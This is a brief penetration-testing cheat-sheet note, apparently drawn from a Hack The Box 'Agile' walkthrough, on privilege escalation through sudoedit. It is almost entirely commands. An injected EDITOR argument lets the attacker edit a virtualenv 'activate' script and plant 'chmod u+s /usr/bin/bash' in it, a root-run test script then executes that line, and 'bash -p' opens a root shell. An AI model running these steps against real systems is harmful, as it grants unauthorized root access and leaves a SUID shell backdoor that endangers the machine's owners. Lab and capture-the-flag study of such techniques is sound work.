sudo-edit

SudoEdit Walkthrough: https://0xdf.gitlab.io/2023/08/05/htb-agile.html

If sudoedit is allowed to run (check with sudo -l command)

E.g.,

(dev_admin : dev_admin) sudoedit /app/config_test.json

Edit the environment "activate" binary

EDITOR="nano -- /app/venv/bin/activate" sudoedit -u dev_admin /app/config_test.json

Add SUID binary command to file (put this command in the file)

chmod u+s /usr/bin/bash

Execute test.sh bash script to run SUID command

/app/test_and_update.sh

Spawn root shell

/usr/bin/bash -p